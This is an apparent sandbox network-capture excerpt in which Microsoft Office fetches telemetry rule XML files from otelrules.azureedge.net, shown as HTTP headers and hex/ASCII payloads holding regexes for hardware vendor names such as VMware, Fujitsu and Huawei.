                                                  2024-10-13 17:34:19 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.44981313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA41997E3"
                                                  x-ms-request-id: b85ce019-d01e-0028-4fe2-1a7896000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfbr2wt66emzt78g400000004r000000000ampy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.44981613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB7010D66"
                                                  x-ms-request-id: 55879866-201e-0033-5b1c-1cb167000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cf9c22xp43k2gbqvn00000002wg000000005v1k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.44981513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 464
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97FB6C3C"
                                                  x-ms-request-id: 92873adb-b01e-003e-0957-1c8e41000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cf9wwz8ehu7c5p33g00000002hg000000004f7t
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.44981813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:20 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DACDF62"
                                                  x-ms-request-id: 94af937e-501e-0047-50ca-1ace6c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173420Z-17db6f7c8cfqxt4wrzg7st2fm800000005bg0000000071t6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.44981713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:20 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                  ETag: "0x8DC582B9748630E"
                                                  x-ms-request-id: 94304cac-901e-0048-809f-1bb800000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173420Z-17db6f7c8cfvq8pt2ak3arkg6n000000035g00000000bnxg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.44981913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:20 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                  ETag: "0x8DC582B9E8EE0F3"
                                                  x-ms-request-id: fa6a24a8-e01e-0099-78e3-1ada8a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173420Z-17db6f7c8cfqkqk8bn4ck6f720000000051g000000003nv1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.44982113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:20 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 428
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC4F34CA"
                                                  x-ms-request-id: 6ca0adc2-b01e-0021-19e3-1acab7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173420Z-17db6f7c8cfnqpbkckdefmqa4400000005ag000000000v29
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.44982013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:20 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:20 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:20 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C8E04C8"
                                                  x-ms-request-id: 11c3f343-501e-0078-0139-1c06cf000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173420Z-17db6f7c8cf9wwz8ehu7c5p33g00000002c000000000fqdv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.44982213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:21 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:21 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 499
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                  ETag: "0x8DC582B98CEC9F6"
                                                  x-ms-request-id: 483006ab-801e-0035-465b-1c752a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173421Z-17db6f7c8cfcrfgzd01a8emnyg00000002rg000000007zen
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:21 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.44982313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:21 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:21 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B988EBD12"
                                                  x-ms-request-id: f7492d67-a01e-000d-0ae4-1ad1ea000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173421Z-17db6f7c8cf5mtxmr1c51513n000000005bg00000000ckgy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.44982513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:21 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:21 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB32BB5CB"
                                                  x-ms-request-id: 6ec52d65-901e-0083-299c-1bbb55000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173421Z-17db6f7c8cfwtn5x6ye8p8q9m000000003t0000000008fx4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
